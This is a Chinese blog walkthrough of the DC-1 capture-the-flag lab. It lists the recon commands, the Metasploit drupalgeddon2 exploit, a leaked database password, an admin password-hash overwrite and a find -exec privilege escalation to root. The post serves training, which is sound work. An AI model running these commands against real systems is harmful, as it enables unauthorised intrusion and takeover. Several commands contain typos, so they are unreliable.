Neos的渗透测试靶机练习——DC-1

简介: Neos的渗透测试靶机练习——DC-1

DC-1
一、实验环境
二、开始渗透

  1. 搜集信息
  2. flag1(CMS版本漏洞)
  3. flag2(CMS配置文件)
  4. flag3(数据库信息)
  5. flag4(靶机用户信息)
  6. flag5(find提权)
    三、总结(心里话(maybe quantui?))
    一、实验环境
    虚拟机软件:VirtualBox
    攻击机:kali linux(网卡初始为仅主机模式,要有安全意识)
    靶机:DC-1(网卡初始为仅主机模式,要有安全意识)
    1
    2
    3
    二、开始渗透
  7. 搜集信息
    输入sudo su,将kali切换到root权限;

输入ifconfig查询自身ip,即攻击机ip;

可以看到自身ip为192.168.56.101。
输入arp-scan -l扫描本网段存活主机,即靶机ip地址。

可以看到靶机ip为192.168.56.102,那192.168.56.100是什么呢?自己想一下。
输入nmap -p- 192.168.56.102扫描靶机所有端口开放情况。

可以看到端口22、80、111、45433是开放的。
尽量不爆破,实际渗透环境中有可能锁ip。
知道http服务是开的,打开浏览器输入192.168.56.102:80大致看一下界面。
命令行输入whatweb -v 192.168.56.102查询网站信息。

可以看到一些关键信息,其中Drupal是一个内容管理系统(CMS)。

  1. flag1(CMS版本漏洞)
    查查有没有版本漏洞,命令行输入msfconsole打开Metasploit
    1

输入search Drupal,查询出了一些版本漏洞,优先使用针对time最近且rank最高的漏洞的exp,即对应exploit/unix/webapp/drupal_drupalgeddon2这个漏洞的exp。

输入use exploit/unix/webapp/drupal_drupalgeddon2,

在metasploit中输入 set RHOSTS 192.168.56.102(靶机ip),
以及set LHOSTS 192.168.56.101(kali系统ip)

开始润,得到shell。

先输入shell,再输入ls,得到flag1.txt,输入cat flag1.txt查看

  1. flag2(CMS配置文件)
    由于这是一个CMS,可以找它的配置文件看一看。
    发现靶机上有python,先输入python -c 'imoprt pty; pty.spawn("/bin/bash")'转成交互式shell,方便操作。
    1
    2

找到Drupal的配置文件在/var/www/sites/defualt/settings.php,查看后获获得flag2.txt。

其中发现数据库信息。

  1. flag3(数据库信息)
    由上图,得知database,username, password。
    输入mysql -udbuser -pR0ck3t登录数据库。
    1
    2

输入show databases;查看有哪些数据库,

通过输入use drupaldb;切换到drupaldb,然后输入show tables;查看表名,发现users。

select*后发现比较乱乱,不过有属性名name和pass,
故输入select name,pass from users;,发现user和password。

密码经过加密,秉持攻击机靶机能不连公网就不连的原则,在本地上网查到drupal的密码修改方法。
cd /var/www后,执行./script/password-hash.sh drneos得到drneos的加密形式。

保存后面的hash字符串,再次进入mysql的drupaldb数据库,修改admin的密码,输入
update user set pass = '$S$DbGB6f5y0ESQdtMn1R61MBNKgHkQTaY5VSmOn41SLbCCek1IPE8M' where uid = 1;

至此,可以登录网站了。
在网站中输入用户名admin,密码deneos,进入drupal。

在Dashboard板块中发现flag3,点击得到flag3内容。

  1. flag4(靶机用户信息)
    命令行输入cat /etc/passwd查看用户信息,发现flag4。

本着能不爆破就不爆破的想法,找啊找,发现了flag4.txt

  1. flag5(find提权)
    最后阶段了,往往都是要提权,这里用find命令。
    输入find flag1.txt -exec "/bin/sh" \;拿到root权限。

进入/root目录,发现最终flag!。

至此,渗透结束。

三、总结(心里话(maybe quantui?))
经过上述的渗透过程,大家应该或多或少有一些想法,如果没有那些现成的工具(metasploit,whatweb,arp-scan等等),你怎么办?如果给你一个纯净的windows系统,什么软件也没有,然后再给你靶机让你去渗透,你能拿下它吗?你能短时间拿下吗?
说实话,我认为最精髓的不是如何熟练使用那些现有的工具,而是自己有那种根据渗透时不同阶段的需求去独立编写出扫描脚本和漏洞利用代码的能力。倘若你发现了漏洞,没有别人现成的脚本、exp,你怎么拿shell?怎么提权?自己开发?你有那个能力吗?越到后面与需要你的开发能力。
第一步是当好脚本小子,学习基本的渗透思路,工具看见一个积累一个,慢慢的,你会发现你越来越强。
最后,其实在实际环境中,社会工程学(钓鱼)和暴力破解(硬上)是最快最有效的,当我意识到这个现象的时候,说实话我的网安心有些动摇。
————————————————

                        版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

原文链接:https://blog.csdn.net/qq_38678845/article/details/135279582

目录
相关文章
|
2月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
2月前
|
Devops Shell 网络安全
Neos的渗透测试靶机练习——Wakanda
Neos的渗透测试靶机练习——Wakanda
26 2
|
2月前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
3月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
40 0
|
2月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
|
2月前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
|
2月前
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
|
2月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
|
29天前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
2月前
|
存储 安全 小程序
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击